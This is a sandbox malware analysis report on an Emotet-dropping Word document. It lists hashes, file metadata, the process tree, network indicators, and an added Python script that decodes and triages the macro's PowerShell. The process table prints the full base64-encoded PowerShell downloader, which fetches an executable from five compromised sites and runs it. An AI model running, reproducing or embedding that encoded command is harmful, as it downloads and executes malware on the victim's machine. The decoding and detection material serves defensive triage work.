File name: | document.doc |
Full analysis: | https://app.any.run/tasks/92323711-715f-481b-b062-715db5ab76ad |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into a highly destructive malware family. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | September 18, 2019, 18:44:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: integrate Colombia, Subject: solution, Author: Irving Blick, Comments: teal Platinum Handmade, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 16:20:00 2019, Last Saved Time/Date: Wed Sep 18 16:20:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 805AD6A3A429E4BA53C5623C96341060 |
SHA1: | ACF55B554581701EC9D7EA28AA5538FC3BD8492A |
SHA256: | 291108E76AA29A2CFFE54FBB938938F3C0B3495276481B7FD92869188828B35D |
SSDEEP: | 6144:x27TDDp6PuaNsxDVN+bk0USWQ5EAnYCyDrgMOqu3rPyuFOarSAL3EnCfc39uK5Mj:x27TDDp6PuaNsxDVW5sLmoXn7NSU4Ve4 |
Extension | Detected type (score)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
CompObjUserType: | Microsoft Word 97-2003 Document
CompObjUserTypeLen: | 32
Manager: | Rippin
HeadingPairs: | -
TitleOfParts: | -
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 641 |
Paragraphs: | 1 |
Lines: | 4 |
Company: | Corkery LLC |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 547 |
Words: | 95 |
Pages: | 1 |
ModifyDate: | 2019:09:18 15:20:00 |
CreateDate: | 2019:09:18 15:20:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | teal Platinum Handmade |
Keywords: | - |
Author: | Irving Blick |
Subject: | solution |
Title: | integrate Colombia |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2808 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\document.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3676 | powershell -encod JABJADQAMQBuAGsAZgBaAHQAPQAnAFUAYwBsAGkAbAAxAEsANQAnADsAJAB3ADIAcQBxAHAAUABoACAAPQAgACcANQAzADYAJwA7ACQAcgBpAFEASQBaAG8AQwA9ACcAbgBpADMAQwBGAEcAcAAnADsAJABjAFMAdwAyAE8AagA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwAyAHEAcQBwAFAAaAArACcALgBlAHgAZQAnADsAJABwAFcASAA0AGgAegBFAFYAPQAnAHIAaQBXAF8AWABZACcAOwAkAFMAdQBrAFUAWABiAD0ALgAoACcAbgBlAHcAJwArACcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAFcARQBCAGMATABpAEUATgBUADsAJABKAEUAQQBiAHAAVgA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYgByAG8AbwBrAGwAeQBuAGwAaQBsAGwAeQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFAAeQBWAE0AUwBwAEEAbAAvAEAAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AaQBuAHQAZQByAG4AYQB0AGkAbwBuAGEAbABmAGUAcgB0AGkAbABpAHQAeQBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcABsAHUAZwBpAG4AcwAvAGMAbABhAHMAcwBpAGMALQBlAGQAaQB0AG8AcgAvAGoAegBiAE4AYgBvAG8AeQBMAC8AQABoAHQAdABwADoALwAvAG0AYQByAGMAbwBmAGEAbQBhAC4AaQB0AC8AbQBhAGkAbAAtAGkAYwBvAG4AcwAvAGwAdwBuAGUAaQA3AC0AZAB4AGkAaAA1ADAAcwA5AHAALQA4ADgAMwAyADAAOQAzADEANgAvAEAAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGsAMQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGsAdABUAEEAYwBiAE4ALwBAAGgAdAB0AHAAOgAvAC8AZAByAGEAcABhAHIAdAAuAG8AcgBnAC8AUAByAGUAbgBzAGEALwBrADAAdgBpAHYANgA4AC0ANQB2ADUALQAyADEAMwA3AC8AJwAuACIAcwBwAGAATABpAHQAIgAoACcAQAAnACkAOwAkAGQAaQBLADIAVwBxAHoAPQAnAGkAaQBZAGkATABsADcAdQAnADsAZgBvAHIAZQBhAGMAaAAoACQAbQBPAEEARgB3AHcAUAAwACAAaQBuACAAJABKAEUAQQBiAHAAVgApAHsAdAByAHkAewAkAFMAdQBrAFUAWABiAC4AIgBkAGAAbwB3AG4AbABPAEEAYABEAEYAaQBgAEwAZQAiACgAJABtAE8AQQBGAHcAdwBQADAALAAgACQAYwBTAHcAMgBPAGoAKQA7ACQAegA5AGkARQBFAFIAPQAnAEYAWgBqAGYAcAB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAYwBTAHcAMgBPAGoAKQAuACIATABFAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADQANQA2ADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGEAYABSAFQAIgAoACQAYwBTAHcAMgBPAGoAKQA7ACQAcAA5AEEAYwBHAFQAPQAnAHAAMABtAHAANABiAFEAJwA7AGIAcgBlAGEAawA7ACQAVABhAEYAWgBHAGoAPQAnAGoAMQBRAEYANABuAHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwB6AEoAdwAzAHAAagA9ACcAUABWAGoATgA5AFMAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
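The `-encod` argument of PID 3676 is the base64 of a UTF-16LE PowerShell script. The Python below is an added example and not part of the ANY.RUN report: it takes the command line exactly as it appears in the process table, recognises the abbreviated switch (powershell.exe accepts any prefix of `-EncodedCommand`), decodes the blob, strips the backtick and `('a'+'b')` string obfuscation, and pulls out the five download URLs, the drop path, the minimum-size gate and the `Process.Start` sink. The helper names, the `%USERPROFILE%` placeholder and the list of suspicious parent processes are this example's own choices. Note the parent: PowerShell is spawned by wmiprvse.exe, consistent with the macro launching it through WMI, so a rule that only keys on WINWORD.EXE as the parent misses this sample. Read against the rest of the report, every HTTP request returned 404, the HTTPS host has no request row, and no `536.exe` appears among the dropped files, so the `catch{}` swallowed each failure and PowerShell exited 0 without fetching a payload.

```python
"""Decode and triage the -encod PowerShell launched as PID 3676 in the report above."""
import base64
import re

# Command line of PID 3676 and its parent process, copied verbatim from the process table above.
CMDLINE_3676 = "powershell -encod JABJADQAMQBuAGsAZgBaAHQAPQAnAFUAYwBsAGkAbAAxAEsANQAnADsAJAB3ADIAcQBxAHAAUABoACAAPQAgACcANQAzADYAJwA7ACQAcgBpAFEASQBaAG8AQwA9ACcAbgBpADMAQwBGAEcAcAAnADsAJABjAFMAdwAyAE8AagA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwAyAHEAcQBwAFAAaAArACcALgBlAHgAZQAnADsAJABwAFcASAA0AGgAegBFAFYAPQAnAHIAaQBXAF8AWABZACcAOwAkAFMAdQBrAFUAWABiAD0ALgAoACcAbgBlAHcAJwArACcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAFcARQBCAGMATABpAEUATgBUADsAJABKAEUAQQBiAHAAVgA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYgByAG8AbwBrAGwAeQBuAGwAaQBsAGwAeQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFAAeQBWAE0AUwBwAEEAbAAvAEAAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AaQBuAHQAZQByAG4AYQB0AGkAbwBuAGEAbABmAGUAcgB0AGkAbABpAHQAeQBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcABsAHUAZwBpAG4AcwAvAGMAbABhAHMAcwBpAGMALQBlAGQAaQB0AG8AcgAvAGoAegBiAE4AYgBvAG8AeQBMAC8AQABoAHQAdABwADoALwAvAG0AYQByAGMAbwBmAGEAbQBhAC4AaQB0AC8AbQBhAGkAbAAtAGkAYwBvAG4AcwAvAGwAdwBuAGUAaQA3AC0AZAB4AGkAaAA1ADAAcwA5AHAALQA4ADgAMwAyADAAOQAzADEANgAvAEAAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGsAMQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGsAdABUAEEAYwBiAE4ALwBAAGgAdAB0AHAAOgAvAC8AZAByAGEAcABhAHIAdAAuAG8AcgBnAC8AUAByAGUAbgBzAGEALwBrADAAdgBpAHYANgA4AC0ANQB2ADUALQAyADEAMwA3AC8AJwAuACIAcwBwAGAATABpAHQAIgAoACcAQAAnACkAOwAkAGQAaQBLADIAVwBxAHoAPQAnAGkAaQBZAGkATABsADcAdQAnADsAZgBvAHIAZQBhAGMAaAAoACQAbQBPAEEARgB3AHcAUAAwACAAaQBuACAAJABKAEUAQQBiAHAAVgApAHsAdAByAHkAewAkAFMAdQBrAFUAWABiAC4AIgBkAGAAbwB3AG4AbABPAEEAYABEAEYAaQBgAEwAZQAiACgAJABtAE8AQQBGAHcAdwBQADAALAAgACQAYwBTAHcAMgBPAGoAKQA7ACQAegA5AGkARQBFAFIAPQAnAEYAWgBqAGYAcAB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAYwBTAHcAMgBPAGoAKQAuACIATABFAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADQANQA2ADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGEAYABSAFQAIgAoACQAYwBTAHcAMgBPAGoAKQA7ACQAcAA5AEEAYwBHAFQAPQAnAHAAMABtAHAANABiAFEAJwA7AGIAcgBlAGEAawA7ACQAVABhAEYAWgBHAGoAPQAnAGoAMQBRAEYANABuAHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwB6AEoAdwAzAHAAagA9ACcAUABWAGoATgA5AFMAJwA="
PARENT_3676 = "wmiprvse.exe"

# A PowerShell single-quoted literal or a $variable (including $env:NAME).
STRING_OR_VAR = r"(?:\$[\w:]+|'[^']*')"


def extract_encoded_arg(cmdline):
    """Return the argument of -EncodedCommand, or None if the switch is absent.

    powershell.exe accepts any prefix of the switch name, so -e, -ec, -enc and
    -encod all mean -EncodedCommand; a detection that only looks for the full
    name misses this sample.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if len(tok) > 1 and tok[0] in "-/" and "encodedcommand".startswith(tok[1:].lower()):
            return tokens[i + 1]
    return None


def decode_encoded_command(blob):
    """-EncodedCommand carries the script as base64 over UTF-16LE, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


def deobfuscate(script):
    """Undo the two string tricks used in this sample.

    Inside double quotes a backtick only means something before 0 a b e f n r
    t u v (lower case), so "LEnG`TH" is plain "LEnGTH"; every other backtick is
    noise. ('new'+'-o'+'bject') is folded back into 'new-object'.
    """
    script = re.sub(r"`([^0abefnrtuv])", r"\1", script)

    def join_literals(m):
        return "'" + "".join(re.findall(r"'([^']*)'", m.group(1))) + "'"

    return re.sub(r"\(\s*('[^']*'(?:\s*\+\s*'[^']*')+)\s*\)", join_literals, script)


def resolve_concat(expr, variables):
    """Evaluate a concatenation of single-quoted literals and $variables.

    Environment variables are kept symbolic as %NAME% (this example's own
    convention) because the sandbox user name is irrelevant to the IOC.
    """
    parts = []
    for part in re.findall(STRING_OR_VAR, expr):
        if part.startswith("'"):
            parts.append(part[1:-1])
        elif part.lower().startswith("$env:"):
            parts.append("%" + part[5:].upper() + "%")
        else:
            parts.append(variables.get(part[1:], part))
    return "".join(parts)


def triage(script):
    """Pull out what a responder needs: URLs, drop path, size gate, execution sink."""
    script = deobfuscate(script)
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", script))
    concat = re.search(r"\$\w+\s*=\s*(" + STRING_OR_VAR + r"(?:\s*\+\s*" + STRING_OR_VAR + r")+)", script)
    size_gate = re.search(r"(?i)length\W*-g[et]\s+(\d+)", script)
    return {
        "urls": re.findall(r"https?://[^'\"@\s]+", script),
        "drop_path": resolve_concat(concat.group(1), literals) if concat else None,
        # Downloads smaller than this are treated as failed (e.g. an error page) and skipped.
        "min_size": int(size_gate.group(1)) if size_gate else None,
        "executes": bool(re.search(r"(?i)diagnostics\.process\]::\W*start", script)),
    }


def triage_process(cmdline, parent):
    """Combine the process-tree signal with the decoded script's IOCs."""
    blob = extract_encoded_arg(cmdline)
    if blob is None:
        return None
    result = triage(decode_encoded_command(blob))
    # WINWORD.EXE is not the parent in this report: wmiprvse.exe spawned PowerShell,
    # consistent with the macro going through WMI. Cover both shapes of the chain.
    result["suspicious_parent"] = parent.lower() in {"wmiprvse.exe", "winword.exe", "excel.exe"}
    return result


if __name__ == "__main__":
    print(deobfuscate(decode_encoded_command(extract_encoded_arg(CMDLINE_3676))))
    for key, value in triage_process(CMDLINE_3676, PARENT_3676).items():
        print(f"{key}: {value}")
```

Running the block prints the cleaned script followed by the extracted fields; the five URLs match the HTTP and connection tables below, the drop path resolves to `%USERPROFILE%\536.exe`, and the size gate is 34562 bytes, which is why a 345-byte 404 body is never executed.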
PID | Process | Filename | Type | |
---|---|---|---|---|
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR885F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:28952035806F582B877137874ED63585 | SHA256:A4B8EBDED044A857566766A6A27AB30EF2EFBAE1155A099D36F2165C12AB8AF1 | |||
2808 | WINWORD.EXE | C:\Users\admin\Downloads\~$cument.doc | pgc | |
MD5:F0F15F884831035CFC4D0CCED43EA6D2 | SHA256:159FB004AFBE4678C2BE81B2CA67048F1305D24A26DD20A75187BC649854A622 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:40EF1C101BC649EA1C7F49FF01F1665C | SHA256:B7797CADAD976937D872026F16ED75C56113DB8E390BDAE665D156725B2CE141 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\371F9047.wmf | wmf | |
MD5:2C1907E7A6F3DBF00469ACBE0D462EAB | SHA256:0E6F4F2BBB2B4898BB83A4D87069DB6C484AEB26CB852C15966ACF00029124ED | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1B4E69C79E8CAC24C7D8C5E712EFC543 | SHA256:3FB7A8EE6DF417E9C41FC52071A634CA51437C8E36B11187D0FD9D4C5E170C9B | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A998F3C6.wmf | wmf | |
MD5:F1649C3862D64C946A53AE2064FDDA4F | SHA256:8200E201DF373751BE0532885E2EA26778AB7710E9414F7179873C99D8F70019 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\871ECB11.wmf | wmf | |
MD5:C134D0DC5A408B885230EB3F8870DFB0 | SHA256:775B7BD5BF2CA5AC5749ECDF6B9F55CDEB61F9F32BDC6DAC0D64B7EA9EB4D9C0 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\document.doc.LNK | lnk | |
MD5:9DD3A25C22D33DCA7EDABE37E3E48530 | SHA256:066BFE956244CE0399F7021C78254EC7696D3711FE878595E9A6930BECB6A1C7 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AA9473CB.wmf | wmf | |
MD5:647A05753C7391B55338F37B5AFDF253 | SHA256:E7DE4C9237CFDB1D64193C2F7A4DF9201DE39FCB812EDF75B5B581D412FA9753 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3676 | powershell.exe | GET | 404 | 88.99.167.17:80 | http://blog.internationalfertilityacademy.com/wp-content/plugins/classic-editor/jzbNbooyL/ | DE | xml | 345 b | unknown |
3676 | powershell.exe | GET | 404 | 5.134.124.81:80 | http://marcofama.it/mail-icons/lwnei7-dxih50s9p-883209316/ | IT | xml | 345 b | unknown |
3676 | powershell.exe | GET | 404 | 45.33.37.47:80 | http://think1.com/wp-content/ktTAcbN/ | US | xml | 345 b | unknown |
3676 | powershell.exe | GET | 404 | 134.0.10.197:80 | http://drapart.org/Prensa/k0viv68-5v5-2137/ | ES | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3676 | powershell.exe | 88.99.167.17:80 | blog.internationalfertilityacademy.com | Hetzner Online GmbH | DE | unknown |
3676 | powershell.exe | 165.22.12.103:443 | www.brooklynlilly.com | — | US | unknown |
3676 | powershell.exe | 134.0.10.197:80 | drapart.org | 10dencehispahard, S.L. | ES | malicious |
3676 | powershell.exe | 5.134.124.81:80 | marcofama.it | ITnet S.r.l. | IT | unknown |
3676 | powershell.exe | 45.33.37.47:80 | think1.com | Linode, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.brooklynlilly.com | — | unknown
blog.internationalfertilityacademy.com | — | unknown
marcofama.it | — | unknown
think1.com | — | unknown
drapart.org | — | malicious